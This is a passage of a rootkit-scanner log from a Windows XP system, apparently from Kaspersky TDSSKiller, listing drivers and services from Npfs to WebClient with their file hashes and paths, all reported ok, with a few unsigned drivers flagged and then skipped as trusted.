13:18:31.0468 0x020c  [ 3182D64AE053D6FB034F44B6DEF8034A, 4ADFC76965BA2A5F488E71789A4E4EA702A74AF42725F72130D1CA919406CF19 ] Npfs            C:\WINDOWS\system32\drivers\Npfs.sys
13:18:31.0609 0x020c  Npfs - ok
13:18:31.0656 0x020c  [ 78A08DD6A8D65E697C18E1DB01C5CDCA, E0E6F3ED05068E32F1D5C2D2B38CDEF4536B8656DB6756C66CF6B40B60C8F3DA ] Ntfs            C:\WINDOWS\system32\drivers\Ntfs.sys
13:18:31.0828 0x020c  Ntfs - ok
13:18:31.0859 0x020c  [ 7F1C1F78D709C4A54CBB46EDE7E0B48D, 52135D41983A9E9E1DCA250A63017076AE22AA06D77CCF2E5EF41154F958584A ] NTIDrvr         C:\WINDOWS\system32\DRIVERS\NTIDrvr.sys
13:18:31.0875 0x020c  NTIDrvr - detected UnsignedFile.Multi.Generic ( 1 )
13:18:31.0875 0x020c  Detect skipped due to KSN trusted
13:18:31.0875 0x020c  NTIDrvr - ok
13:18:31.0890 0x020c  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] NtLmSsp         C:\WINDOWS\system32\lsass.exe
13:18:32.0015 0x020c  NtLmSsp - ok
13:18:32.0062 0x020c  [ 156F64A3345BD23C600655FB4D10BC08, 9611BE411586E068D9297D77102DB3BE48AA67F1BAD6F61A84F83FC3043FA9CD ] NtmsSvc         C:\WINDOWS\system32\ntmssvc.dll
13:18:32.0234 0x020c  NtmsSvc - ok
13:18:32.0250 0x020c  [ 73C1E1F395918BC2C6DD67AF7591A3AD, B21133A75253EC15E2DFF66D3B480AB1A7E1A2360476C810E7AA55D0F0EB08D4 ] Null            C:\WINDOWS\system32\drivers\Null.sys
13:18:32.0375 0x020c  Null - ok
13:18:32.0390 0x020c  [ B305F3FAD35083837EF46A0BBCE2FC57, 9D0E0E666D652D0FC9EAB97280A5D67AAF61D6B21929DF7CF8ED72A367720464 ] NwlnkFlt        C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
13:18:32.0531 0x020c  NwlnkFlt - ok
13:18:32.0546 0x020c  [ C99B3415198D1AAB7227F2C88FD664B9, DD8DA4B5E804F134AB9233859544C025062902DFC3E8FB8A09A67337A4E73F55 ] NwlnkFwd        C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
13:18:32.0687 0x020c  NwlnkFwd - ok
13:18:32.0796 0x020c  [ 785F487A64950F3CB8E9F16253BA3B7B, 02445344BD214370A6D48B1CA04921D8EFCB13E676B5648266DD0E076C0822B6 ] odserv          C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
13:18:32.0828 0x020c  odserv - ok
13:18:32.0875 0x020c  [ CA33832DF41AFB202EE7AEB05145922F, 9DD0089C2E13C7F81214C3B5A4A61276292052F9BBFEA7FCD0F6AA27815D5F95 ] ohci1394        C:\WINDOWS\system32\DRIVERS\ohci1394.sys
13:18:33.0015 0x020c  ohci1394 - ok
13:18:33.0046 0x020c  [ 5A432A042DAE460ABE7199B758E8606C, 6E5D1F477D290905BE27CEBF9572BAC6B05FFEF2FAD901D3C8E11F665F8B9A71 ] ose             C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
13:18:33.0062 0x020c  ose - ok
13:18:33.0093 0x020c  [ 5575FAF8F97CE5E713D108C2A58D7C7C, 96D4595D19A78CCBE8B325A08780AC077AE5CC99642ACD72FB47AEAE8D344D3B ] Parport         C:\WINDOWS\system32\DRIVERS\parport.sys
13:18:33.0234 0x020c  Parport - ok
13:18:33.0265 0x020c  [ BEB3BA25197665D82EC7065B724171C6, 7E71C13BA30CD95CEE8A9CC85E6F48A01F30EDEAADEE69D80AE828BF97E5A5CA ] PartMgr         C:\WINDOWS\system32\drivers\PartMgr.sys
13:18:33.0437 0x020c  PartMgr - ok
13:18:33.0468 0x020c  [ 70E98B3FD8E963A6A46A2E6247E0BEA1, 6771313EC41B3B5BFD398F60706E40BE71617046880CC352DD110B001AFC22A1 ] ParVdm          C:\WINDOWS\system32\drivers\ParVdm.sys
13:18:33.0609 0x020c  ParVdm - ok
13:18:33.0625 0x020c  [ A219903CCF74233761D92BEF471A07B1, D4E6C360A1D2FCA4D17C991B834D68BF20F5111DD06B1FAB8B22984804CEC269 ] PCI             C:\WINDOWS\system32\DRIVERS\pci.sys
13:18:33.0765 0x020c  PCI - ok
13:18:33.0796 0x020c  [ CCF5F451BB1A5A2A522A76E670000FF0, D63F7E5A39653EC9CCE94B7D84B2D3EBD4F54533BD65701020198724042C9257 ] PCIIde          C:\WINDOWS\system32\DRIVERS\pciide.sys
13:18:33.0937 0x020c  PCIIde - ok
13:18:33.0968 0x020c  [ 9E89EF60E9EE05E3F2EEF2DA7397F1C1, 0BA3DB21DC7C641C181E2635B5C9B73965FDCDCD3EBBBE48FCFEC1C8C987F617 ] Pcmcia          C:\WINDOWS\system32\drivers\Pcmcia.sys
13:18:34.0109 0x020c  Pcmcia - ok
13:18:34.0125 0x020c  perc2 - ok
13:18:34.0125 0x020c  perc2hib - ok
13:18:34.0171 0x020c  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] PlugPlay        C:\WINDOWS\system32\services.exe
13:18:34.0187 0x020c  PlugPlay - ok
13:18:34.0234 0x020c  [ 65BC271F337637731D3C71455AE1F476, DAD32B61FE0147F8D2DA4C8F016920CD6BB2098F16E3CC2768009763E71DEFBC ] Pml Driver HPZ12 C:\WINDOWS\system32\HPZipm12.dll
13:18:34.0250 0x020c  Pml Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )
13:18:34.0250 0x020c  Detect skipped due to KSN trusted
13:18:34.0250 0x020c  Pml Driver HPZ12 - ok
13:18:34.0281 0x020c  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] PolicyAgent     C:\WINDOWS\system32\lsass.exe
13:18:34.0421 0x020c  PolicyAgent - ok
13:18:34.0468 0x020c  [ EFEEC01B1D3CF84F16DDD24D9D9D8F99, C5F0C8C66A3AF7E7BB04CEDE4AC5306F8387AB384A2107DC5BE413AAE968EFF1 ] PptpMiniport    C:\WINDOWS\system32\DRIVERS\raspptp.sys
13:18:34.0640 0x020c  PptpMiniport - ok
13:18:34.0640 0x020c  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe
13:18:34.0796 0x020c  ProtectedStorage - ok
13:18:34.0796 0x020c  [ 09298EC810B07E5D582CB3A3F9255424, 35473A1BE25AC289474090EB0806AC6B3035DC33D1F3DF97A14BF1E361AC6AC3 ] PSched          C:\WINDOWS\system32\DRIVERS\psched.sys
13:18:34.0937 0x020c  PSched - ok
13:18:34.0968 0x020c  [ 00B670D8A36C7134CFC66B446A18CC92, 4D9DAEE5C9AED4AC6622AB8EFA634FE1E525B604604B5D655533DB4579964B62 ] psdfilter       C:\WINDOWS\system32\Drivers\psdfilter.sys
13:18:34.0984 0x020c  psdfilter - detected UnsignedFile.Multi.Generic ( 1 )
13:18:34.0984 0x020c  Detect skipped due to KSN trusted
13:18:34.0984 0x020c  psdfilter - ok
13:18:35.0000 0x020c  [ E9A60343CB7C39090638B1DD574F26EB, 52632F9E16C3B2BDF054D6AFB9BFF0FCD81F399669819C092D95128ED4D14BE0 ] psdvdisk        C:\WINDOWS\system32\Drivers\psdvdisk.sys
13:18:35.0015 0x020c  psdvdisk - detected UnsignedFile.Multi.Generic ( 1 )
13:18:35.0015 0x020c  Detect skipped due to KSN trusted
13:18:35.0015 0x020c  psdvdisk - ok
13:18:35.0046 0x020c  [ 80D317BD1C3DBC5D4FE7B1678C60CADD, DA76804B55D0CAB3DDD01EFC06673764AE4860693375C658B6063FB14AF7F12C ] Ptilink         C:\WINDOWS\system32\DRIVERS\ptilink.sys
13:18:35.0171 0x020c  Ptilink - ok
13:18:35.0187 0x020c  ql1080 - ok
13:18:35.0187 0x020c  Ql10wnt - ok
13:18:35.0203 0x020c  ql12160 - ok
13:18:35.0203 0x020c  ql1240 - ok
13:18:35.0218 0x020c  ql1280 - ok
13:18:35.0234 0x020c  [ FE0D99D6F31E4FAD8159F690D68DED9C, 998685622ABE631984B7E4DBF91AB3594B1F574378D75EB9F6265F4650470692 ] RasAcd          C:\WINDOWS\system32\DRIVERS\rasacd.sys
13:18:35.0359 0x020c  RasAcd - ok
13:18:35.0390 0x020c  [ AD188BE7BDF94E8DF4CA0A55C00A5073, C7D76CB579FAEBCCC2873499441BACDD6BD6668ACF5ED7F31862656E96E2B20C ] RasAuto         C:\WINDOWS\System32\rasauto.dll
13:18:35.0546 0x020c  RasAuto - ok
13:18:35.0562 0x020c  [ 11B4A627BC9614B885C4969BFA5FF8A6, EAE0A412A2B0F68919C32A96B3A08CC1A06585E4998819F5C9051745F63FF5AD ] Rasl2tp         C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
13:18:35.0687 0x020c  Rasl2tp - ok
13:18:35.0734 0x020c  [ 76A9A3CBEADD68CC57CDA5E1D7448235, 4AFD048C5D2306AB8DE46F3AA60AC0213333DDA3B09A9E91F7585DB6EB978EC8 ] RasMan          C:\WINDOWS\System32\rasmans.dll
13:18:35.0875 0x020c  RasMan - ok
13:18:35.0875 0x020c  [ 5BC962F2654137C9909C3D4603587DEE, A5CE5653D0105240F5E86CFAAB89E7917D42D939E2F27A5A7D6979289CA651B8 ] RasPppoe        C:\WINDOWS\system32\DRIVERS\raspppoe.sys
13:18:36.0015 0x020c  RasPppoe - ok
13:18:36.0046 0x020c  [ FDBB1D60066FCFBB7452FD8F9829B242, 10A2DACF944BD000032EBA8C095CB3D879CC55B28C377ADF6E52E508E47444DB ] Raspti          C:\WINDOWS\system32\DRIVERS\raspti.sys
13:18:36.0187 0x020c  Raspti - ok
13:18:36.0234 0x020c  [ 7AD224AD1A1437FE28D89CF22B17780A, 6645235CA27D671954E3557FA37082881C3D7D47492C71264CD8CB8D108EC801 ] Rdbss           C:\WINDOWS\system32\DRIVERS\rdbss.sys
13:18:36.0390 0x020c  Rdbss - ok
13:18:36.0390 0x020c  [ 4912D5B403614CE99C28420F75353332, 975341ECD660209987B5E5171B8315E032439E408CBE8A5986E67AF767F373BB ] RDPCDD          C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
13:18:36.0578 0x020c  RDPCDD - ok
13:18:36.0609 0x020c  [ 15CABD0F7C00C47C70124907916AF3F1, 66B5C978B7FB6359AD8BAC9F568FE9D469E358FEAB07B1F129BA9E85F1DF723E ] rdpdr           C:\WINDOWS\system32\DRIVERS\rdpdr.sys
13:18:36.0765 0x020c  rdpdr - ok
13:18:36.0796 0x020c  [ 43AF5212BD8FB5BA6EED9754358BD8F7, AF330F61CECA4AFA359CEABC5EB3227E6B56A9A2DCE50701381D665122D7356D ] RDPWD           C:\WINDOWS\system32\drivers\RDPWD.sys
13:18:36.0828 0x020c  RDPWD - ok
13:18:36.0859 0x020c  [ 3C37BF86641BDA977C3BF8A840F3B7FA, AB9A6E54DBA3F4561CD4837372BECCE0D73943D02E3288F944333039375AC08C ] RDSessMgr       C:\WINDOWS\system32\sessmgr.exe
13:18:37.0000 0x020c  RDSessMgr - ok
13:18:37.0031 0x020c  [ F828DD7E1419B6653894A8F97A0094C5, E6150E1F598BA4CFEDB8FF075BC0D576518C331B864388F1CAE8812EFF106ECF ] redbook         C:\WINDOWS\system32\DRIVERS\redbook.sys
13:18:37.0171 0x020c  redbook - ok
13:18:37.0234 0x020c  [ 7E699FF5F59B5D9DE5390E3C34C67CF5, 3FCF0442D80AB181FED4303E570378736AA1F8718C0B8B70F689A1E45200FFE4 ] RemoteAccess    C:\WINDOWS\System32\mprdim.dll
13:18:37.0390 0x020c  RemoteAccess - ok
13:18:37.0421 0x020c  [ 5B19B557B0C188210A56A6B699D90B8F, 0FA880B81AE615206FD1738B83428AAA491D54B24168339DE6E87FDE8C6C14B0 ] RemoteRegistry  C:\WINDOWS\system32\regsvc.dll
13:18:37.0562 0x020c  RemoteRegistry - ok
13:18:37.0578 0x020c  [ D8B0B4ADE32574B2D9C5CC34DC0DBBE7, CDF10D3D8ADA7ADB1CC1567BFA986557C6D69F4099B70FDFABD4C3D09E3CA778 ] ROOTMODEM       C:\WINDOWS\system32\Drivers\RootMdm.sys
13:18:37.0718 0x020c  ROOTMODEM - ok
13:18:37.0718 0x020c  [ AAED593F84AFA419BBAE8572AF87CF6A, CC0FFC5A69394C8830DC66320DA01A820BBF41AD7E57D0FC343561DC5EF9A360 ] RpcLocator      C:\WINDOWS\system32\locator.exe
13:18:37.0859 0x020c  RpcLocator - ok
13:18:37.0890 0x020c  [ 6B27A5C03DFB94B4245739065431322C, 6AEAC16AB4E0DFD25123AAF4D4181FEE1B919B7B2793117006CE8CF30E826CFD ] RpcSs           C:\WINDOWS\System32\rpcss.dll
13:18:37.0937 0x020c  RpcSs - ok
13:18:37.0968 0x020c  [ 471B3F9741D762ABE75E9DEEA4787E47, D9ADE42965EC22AEB4B2AD21D429C3C8232A60AA9853DEFDA7AED86A13FE8623 ] RSVP            C:\WINDOWS\system32\rsvp.exe
13:18:38.0109 0x020c  RSVP - ok
13:18:38.0125 0x020c  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] SamSs           C:\WINDOWS\system32\lsass.exe
13:18:38.0250 0x020c  SamSs - ok
13:18:38.0281 0x020c  [ 39763504067962108505BFF25F024345, 73C9710B61EDC7FBEDE1D7A767AA3D3A169E7AD012494D05CB5EE7E5C5752BB9 ] SASDIFSV        C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
13:18:38.0296 0x020c  SASDIFSV - ok
13:18:38.0312 0x020c  [ 77B9FC20084B48408AD3E87570EB4A85, B5BC5FEC1356DECB66A7A671DB67112BDAC8F942BF1C4B986B1805B41EF362B1 ] SASKUTIL        C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS
13:18:38.0328 0x020c  SASKUTIL - ok
13:18:38.0343 0x020c  [ 86D007E7A654B9A71D1D7D856B104353, 7B1DE53D637A5FC9619D5D07C48927AFEC89D959207F6F2E2F45DD054EEA04C7 ] SCardSvr        C:\WINDOWS\System32\SCardSvr.exe
13:18:38.0500 0x020c  SCardSvr - ok
13:18:38.0531 0x020c  [ 0A9A7365A1CA4319AA7C1D6CD8E4EAFA, 0B582F47BD70732BAC48B8B86E5D06CE7F299A20E8177F3F2E6F28217C3FB605 ] Schedule        C:\WINDOWS\system32\schedsvc.dll
13:18:38.0671 0x020c  Schedule - ok
13:18:38.0703 0x020c  [ 90A3935D05B494A5A39D37E71F09A677, F72733A69BC6E1A2BB91D7632FF3463C12563F60FDCC00A2CDD67FF20D479952 ] Secdrv          C:\WINDOWS\system32\DRIVERS\secdrv.sys
13:18:38.0859 0x020c  Secdrv - ok
13:18:38.0875 0x020c  [ CBE612E2BB6A10E3563336191EDA1250, C331797DC3569F0E715766561DE2562F60B924378842246C35D2B1CF867E9D96 ] seclogon        C:\WINDOWS\System32\seclogon.dll
13:18:39.0031 0x020c  seclogon - ok
13:18:39.0046 0x020c  [ 7FDD5D0684ECA8C1F68B4D99D124DCD0, 7105B026F966A992430F86C3698ABE15EC73E4772F1A3E362E29FD5247A5DCA6 ] SENS            C:\WINDOWS\system32\sens.dll
13:18:39.0203 0x020c  SENS - ok
13:18:39.0234 0x020c  [ 0F29512CCD6BEAD730039FB4BD2C85CE, 4F98AE390D1B14A755700DD6CEFB9CF921F0404AF2145D2D7E5F52394F87C6A5 ] serenum         C:\WINDOWS\system32\DRIVERS\serenum.sys
13:18:39.0375 0x020c  serenum - ok
13:18:39.0406 0x020c  [ CCA207A8896D4C6A0C9CE29A4AE411A7, 5999B39242283CD803319AADCA171CCCC6E2A40FB2FAFA51B1D29F3FF2DD8D6C ] Serial          C:\WINDOWS\system32\DRIVERS\serial.sys
13:18:39.0546 0x020c  Serial - ok
13:18:39.0593 0x020c  [ 8E6B8C671615D126FDC553D1E2DE5562, CEEC0067514555D5CA489F50E3D7562FCA8DB8E952C3C878604C9277FC77959F ] Sfloppy         C:\WINDOWS\system32\drivers\Sfloppy.sys
13:18:39.0734 0x020c  Sfloppy - ok
13:18:39.0765 0x020c  [ 83F41D0D89645D7235C051AB1D9523AC, B681F33EEAA511D6A2DCB9FBAA407B739184C9FF6067C6B7E51F1FC37E9D4DD7 ] SharedAccess    C:\WINDOWS\System32\ipnathlp.dll
13:18:39.0937 0x020c  SharedAccess - ok
13:18:39.0968 0x020c  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
13:18:39.0984 0x020c  ShellHWDetection - ok
13:18:40.0000 0x020c  Simbad - ok
13:18:40.0015 0x020c  Sparrow - ok
13:18:40.0046 0x020c  [ AB8B92451ECB048A4D1DE7C3FFCB4A9F, DD17733CBB370FCA08F0296704D7CBEACA3C8F76D0ABE4761C3B1FFDF7481D9E ] splitter        C:\WINDOWS\system32\drivers\splitter.sys
13:18:40.0171 0x020c  splitter - ok
13:18:40.0218 0x020c  [ 60784F891563FB1B767F70117FC2428F, E0B07F08E60FFBAD36C2E58180F4B2A16DCA47716044CBE0213DF7B74D742F1F ] Spooler         C:\WINDOWS\system32\spoolsv.exe
13:18:40.0250 0x020c  Spooler - ok
13:18:40.0265 0x020c  [ 76BB022C2FB6902FD5BDD4F78FC13A5D, 6031CB2344D7277FC703480EB43CF856A0F8F818EA98FF26A2CA532336CD2DFA ] sr              C:\WINDOWS\system32\DRIVERS\sr.sys
13:18:40.0406 0x020c  sr - ok
13:18:40.0453 0x020c  [ 3805DF0AC4296A34BA4BF93B346CC378, B57A14F1B7B0997E619DDD62B73157AA2399A9852166FB58139CBB358A88F6F3 ] srservice       C:\WINDOWS\system32\srsvc.dll
13:18:40.0609 0x020c  srservice - ok
13:18:40.0656 0x020c  [ 47DDFC2F003F7F9F0592C6874962A2E7, 17C643BD4EB09B5666FE41817DC785BE04A6E491CE79E8E5A702CDBD98E1BDD7 ] Srv             C:\WINDOWS\system32\DRIVERS\srv.sys
13:18:40.0687 0x020c  Srv - ok
13:18:40.0703 0x020c  [ 0A5679B3714EDAB99E357057EE88FCA6, 01E1A101FFF48402C77E385A78FEF27876E04533B60EB1C18558A737E57E5FA8 ] SSDPSRV         C:\WINDOWS\System32\ssdpsrv.dll
13:18:40.0843 0x020c  SSDPSRV - ok
13:18:40.0875 0x020c  [ A9573045BAA16EAB9B1085205B82F1ED, 6A4D68BCD4968C17451EB1C4AB420FFA844D089845520D222BC4A2BD14583C56 ] StillCam        C:\WINDOWS\system32\DRIVERS\serscan.sys
13:18:41.0000 0x020c  StillCam - ok
13:18:41.0031 0x020c  [ 8BAD69CBAC032D4BBACFCE0306174C30, 2AA0DA710FCBFF38FE8DA91EE02E7A4503269347E61F8D3246FCA3384BBA2305 ] stisvc          C:\WINDOWS\system32\wiaservc.dll
13:18:41.0203 0x020c  stisvc - ok
13:18:41.0265 0x020c  [ 2E5586392CDFBD1D73BADB20E9ED6386, 8C296A4EB50750D5CC59C8B96034017AD957F8BE09153196778A519F061876EA ] SupportSoft RemoteAssist C:\Program Files\Common Files\SupportSoft\bin\ssrc.exe
13:18:41.0296 0x020c  SupportSoft RemoteAssist - ok
13:18:41.0343 0x020c  [ 3941D127AEF12E93ADDF6FE6EE027E0F, EA1F0E32E1C5E90FA4AAC421DEBBE086512340758D3217A6334E886BCE638B51 ] swenum          C:\WINDOWS\system32\DRIVERS\swenum.sys
13:18:41.0484 0x020c  swenum - ok
13:18:41.0500 0x020c  [ 8CE882BCC6CF8A62F2B2323D95CB3D01, B408550A581F3DA222355964AFA4E976AD8471F0AA37573C42C4948AE5A23A3B ] swmidi          C:\WINDOWS\system32\drivers\swmidi.sys
13:18:41.0687 0x020c  swmidi - ok
13:18:41.0687 0x020c  SwPrv - ok
13:18:41.0703 0x020c  symc810 - ok
13:18:41.0718 0x020c  symc8xx - ok
13:18:41.0750 0x020c  [ B226F8A4D780ACDF76145B58BB791D5B, 6E8304956E9FD827A2FCAB0CB9D200500E8E71CE79C9909684666DD548D3FD31 ] symlcbrd        C:\WINDOWS\system32\drivers\symlcbrd.sys
13:18:41.0765 0x020c  symlcbrd - ok
13:18:41.0765 0x020c  sym_hi - ok
13:18:41.0781 0x020c  sym_u3 - ok
13:18:41.0781 0x020c  [ 8B83F3ED0F1688B4958F77CD6D2BF290, 546D3602183702B4F53E84413CFA2C933D64C8540378E54A8DCD148F3F36A2DA ] sysaudio        C:\WINDOWS\system32\drivers\sysaudio.sys
13:18:41.0921 0x020c  sysaudio - ok
13:18:41.0953 0x020c  [ C7ABBC59B43274B1109DF6B24D617051, 4384CA0AA6CE9B603CF7DB775A3C721E46715D5B120B94FB57DEADAADE18535B ] SysmonLog       C:\WINDOWS\system32\smlogsvc.exe
13:18:42.0109 0x020c  SysmonLog - ok
13:18:42.0156 0x020c  [ 3CB78C17BB664637787C9A1C98F79C38, F35C31F6B7F366CB949D1044B357C76DEC9170441C5E559802794F62B72FD255 ] TapiSrv         C:\WINDOWS\System32\tapisrv.dll
13:18:42.0296 0x020c  TapiSrv - ok
13:18:42.0343 0x020c  [ 9AEFA14BD6B182D61E3119FA5F436D3D, EA29E49434585409272E7901AF89771FE9D6E911A7DC44AB3C7020CFF8A44552 ] Tcpip           C:\WINDOWS\system32\DRIVERS\tcpip.sys
13:18:42.0375 0x020c  Tcpip - ok
13:18:42.0406 0x020c  [ 6471A66807F5E104E4885F5B67349397, F35CBFFB8BB235CCE30EF94A5273333900DD49FD506BF9D55D99A320B8A53A5A ] TDPIPE          C:\WINDOWS\system32\drivers\TDPIPE.sys
13:18:42.0546 0x020c  TDPIPE - ok
13:18:42.0562 0x020c  [ C56B6D0402371CF3700EB322EF3AAF61, 7743FA4C734BCE38EFB1CA69BC17364D8421E2CD172F856F7E38E7AE1EE93F2F ] TDTCP           C:\WINDOWS\system32\drivers\TDTCP.sys
13:18:42.0703 0x020c  TDTCP - ok
13:18:42.0718 0x020c  [ 88155247177638048422893737429D9E, B6D4E8691917946332C2208D01F8C8281978C1AD1E9951C5D99DF0D49AC34B3B ] TermDD          C:\WINDOWS\system32\DRIVERS\termdd.sys
13:18:42.0859 0x020c  TermDD - ok
13:18:42.0906 0x020c  [ FF3477C03BE7201C294C35F684B3479F, D6246521539BA4ACD022D26983182F5E323D2EF1EA7C54265A248C43A1CE5202 ] TermService     C:\WINDOWS\System32\termsrv.dll
13:18:43.0046 0x020c  TermService - ok
13:18:43.0078 0x020c  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] Themes          C:\WINDOWS\System32\shsvcs.dll
13:18:43.0093 0x020c  Themes - ok
13:18:43.0109 0x020c  [ DB7205804759FF62C34E3EFD8A4CC76A, 13A4248F528CE98ACA66898E56822E4FC49B11F491FF1F61A687BA601BF0A802 ] TlntSvr         C:\WINDOWS\system32\tlntsvr.exe
13:18:43.0265 0x020c  TlntSvr - ok
13:18:43.0265 0x020c  TosIde - ok
13:18:43.0296 0x020c  [ 55BCA12F7F523D35CA3CB833C725F54E, 849FB1AE31B143B14B298BBC0D91230693D41DEB95F46516878F53A7F4186C38 ] TrkWks          C:\WINDOWS\system32\trkwks.dll
13:18:43.0437 0x020c  TrkWks - ok
13:18:43.0453 0x020c  [ E0C67BE430C6DE490D6CCAECFA071F9E, 831858F9A07122FBE513FC56D79F39F973FC9BA757D509C113AA975DE8A70EE5 ] UBHelper        C:\WINDOWS\system32\drivers\UBHelper.sys
13:18:43.0453 0x020c  UBHelper - detected UnsignedFile.Multi.Generic ( 1 )
13:18:43.0453 0x020c  Detect skipped due to KSN trusted
13:18:43.0453 0x020c  UBHelper - ok
13:18:43.0468 0x020c  [ 5787B80C2E3C5E2F56C2A233D91FA2C9, 3774905CF77954DFCECDA5BCC7CDE3D0ED72712BFAAD85ADAE5246306447E46C ] Udfs            C:\WINDOWS\system32\drivers\Udfs.sys
13:18:43.0609 0x020c  Udfs - ok
13:18:43.0625 0x020c  ultra - ok
13:18:43.0671 0x020c  [ 402DDC88356B1BAC0EE3DD1580C76A31, 32A686595710336A6BFD54C03F552AE39439611662F84EF5D24193AE5665C6F3 ] Update          C:\WINDOWS\system32\DRIVERS\update.sys
13:18:43.0828 0x020c  Update - ok
13:18:43.0875 0x020c  [ 1EBAFEB9A3FBDC41B8D9C7F0F687AD91, 7746916DB48E3F5B243B63C066596AD9037A494BF1AD935946DD04AC85D983DF ] upnphost        C:\WINDOWS\System32\upnphost.dll
13:18:44.0031 0x020c  upnphost - ok
13:18:44.0046 0x020c  [ 05365FB38FCA1E98F7A566AAAF5D1815, 16843048CEEC3DAA3B953A12FF1EE339E86783A08F2A56DA7F94AD9F9717D77D ] UPS             C:\WINDOWS\System32\ups.exe
13:18:44.0187 0x020c  UPS - ok
13:18:44.0218 0x020c  [ 73B41F4EAD65F355962168D766AF0F2E, AA33CAE55D4766C9F1E9F1B50EEAE1CA4BE968380C89892A46D2D25EAEEDC64D ] USBAAPL         C:\WINDOWS\system32\Drivers\usbaapl.sys
13:18:44.0250 0x020c  USBAAPL - ok
13:18:44.0281 0x020c  [ 1B611611C28D2DF25BC057D79C6F13FC, B0D86F63E44B40413BBAE6402CC088046CFAE082D41BBC2ED5A916293356B846 ] usbccgp         C:\WINDOWS\system32\DRIVERS\usbccgp.sys
13:18:44.0296 0x020c  usbccgp - ok
13:18:44.0312 0x020c  [ 4BAC8DF07F1D8434FC640E677A62204E, 76C1351AF6752224BF59DEEE0F8665FE699F3DFD679F5BCD01C7D9383E6402A4 ] usbehci         C:\WINDOWS\system32\DRIVERS\usbehci.sys
13:18:44.0343 0x020c  usbehci - ok
13:18:44.0375 0x020c  [ 1AB3CDDE553B6E064D2E754EFE20285C, A99C4528C4227B1E96847614745AAFACD3C5F1BDFE435214DBF78740FFB300FE ] usbhub          C:\WINDOWS\system32\DRIVERS\usbhub.sys
13:18:44.0515 0x020c  usbhub - ok
13:18:44.0531 0x020c  [ A717C8721046828520C9EDF31288FC00, 1530BBE832EDBB0974AD89D723A03FF7A0094B368992D73C2C3E62A181DF1E0A ] usbprint        C:\WINDOWS\system32\DRIVERS\usbprint.sys
13:18:44.0687 0x020c  usbprint - ok
13:18:44.0718 0x020c  [ F8EDE2B6928970DCE3D5614C27D9E7F6, 6E5EBBC8B70C1D593634DAF0C190DEADFDA18C3CBC8F552A76F156F3869EF05B ] usbscan         C:\WINDOWS\system32\DRIVERS\usbscan.sys
13:18:44.0750 0x020c  usbscan - ok
13:18:44.0750 0x020c  [ A32426D9B14A089EAA1D922E0C5801A9, ED1DC52EE45F8EAD3AEC4B1F817BB25634141CF48295494C5947DCE6CF7A9817 ] USBSTOR         C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
13:18:44.0921 0x020c  USBSTOR - ok
13:18:44.0953 0x020c  [ 26496F9DEE2D787FC3E61AD54821FFE6, 8BE7FF647470B9A951CBB478FAF83D657A15CC78037F42348A6B738F21D523DA ] usbuhci         C:\WINDOWS\system32\DRIVERS\usbuhci.sys
13:18:45.0093 0x020c  usbuhci - ok
13:18:45.0093 0x020c  [ 0D3A8FAFCEACD8B7625CD549757A7DF1, B9CFDEFCD66AA139F3DC2F967B184669532922563AD5A71769BABDC4370D065E ] VgaSave         C:\WINDOWS\System32\drivers\vga.sys
13:18:45.0250 0x020c  VgaSave - ok
13:18:45.0250 0x020c  ViaIde - ok
13:18:45.0281 0x020c  [ 4C8FCB5CC53AAB716D810740FE59D025, 010EAC43DBED700B73E4FC908FAAF9F6A0168EBBD5D86751E49BC33AAA18BFA4 ] VolSnap         C:\WINDOWS\system32\drivers\VolSnap.sys
13:18:45.0421 0x020c  VolSnap - ok
13:18:45.0484 0x020c  [ 7A9DB3A67C333BF0BD42E42B8596854B, D31A9A3B1AAAB373EDD73B674102395212FCB616F829E938B7B2B7BE7D4752C5 ] VSS             C:\WINDOWS\System32\vssvc.exe
13:18:45.0640 0x020c  VSS - ok
13:18:45.0671 0x020c  [ 54AF4B1D5459500EF0937F6D33B1914F, FA1876888BCB9C72A92369DBED4FF1A8666784523FB41E618FA0919490FCDDB9 ] W32Time         C:\WINDOWS\system32\w32time.dll
13:18:45.0828 0x020c  W32Time - ok
13:18:45.0859 0x020c  [ E20B95BAEDB550F32DD489265C1DA1F6, 5589B2067E6C9FBA290D8C5EADDC198EBAF39C50C3CD7D2BC5CDA7CBFBC445E5 ] Wanarp          C:\WINDOWS\system32\DRIVERS\wanarp.sys
13:18:46.0015 0x020c  Wanarp - ok
13:18:46.0031 0x020c  [ 6768ACF64B18196494413695F0C3A00F, 3A8F8586F1D997D19A8478345338D2AECD785AEABDB61531DD3F92003D3230A5 ] wdmaud          C:\WINDOWS\system32\drivers\wdmaud.sys
13:18:46.0171 0x020c  wdmaud - ok
13:18:46.0218 0x020c  [ 77A354E28153AD2D5E120A5A8687BC06, 8B2D37A4443501C0A8E70BC2079BE27F0A36FD07B561E6F68B40A72EABBC2DFE ] WebClient       C:\WINDOWS\System32\webclnt.dll
13:18:46.0359 0x020c  WebClient - ok
